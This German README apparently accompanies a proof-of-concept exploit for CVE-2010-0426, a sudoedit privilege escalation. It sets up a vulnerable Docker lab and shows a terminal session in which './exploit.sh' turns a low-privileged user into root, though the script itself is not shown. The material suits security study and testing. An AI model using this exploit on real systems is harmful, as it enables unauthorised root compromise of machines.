
Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Lokale Privilegieneskalation und anfälliger Container
Sudo (su „do“) erlaubt einem Systemadministrator, bestimmten Benutzern (oder Benutzergruppen) die Fähigkeit zu geben, einige (oder alle) Befehle als root auszuführen, während alle Befehle und Argumente protokolliert werden.
Um eine angreifbare Umgebung für Ihren Test einzurichten, benötigen Sie installiertes Docker und führen Sie einfach den folgenden Befehl aus:
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
Und es wird eine interaktive Shell mit niedrigen Benutzerrechten starten.
Der Fehler wurde in sudoedit gefunden, das den Befehl 'sudoedit' nicht korrekt verarbeitet. Dies ermöglicht einem böswilligen Benutzer, den echten sudoedit-Befehl durch einen beliebigen Befehl zu ersetzen.
Lokale Angreifer könnten dieses Problem ausnutzen, um beliebige Befehle als 'root'-Benutzer auszuführen. Erfolgreiche Exploits können einen betroffenen Computer vollständig kompromittieren.
Um dieses Ziel auszunutzen, führen Sie einfach aus:
./exploit.sh
Wenn Sie dieses angreifbare Image verwenden, können Sie einfach ausführen:
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
Dieser Fehler wurde von Slouching gefunden.
Dieses oder vorherige Programm dient NUR zu Bildungszwecken. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (t0kx) nicht haftbar bin für Schäden, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionalität entstehen. Der Autor oder ein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder die missbräuchliche Verwendung dieser Programme oder deren Ableitungen. Durch die Nutzung dieser Programme akzeptieren Sie die Tatsache, dass jegliche Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme verursacht werden, nicht in der Verantwortung von t0kx liegen.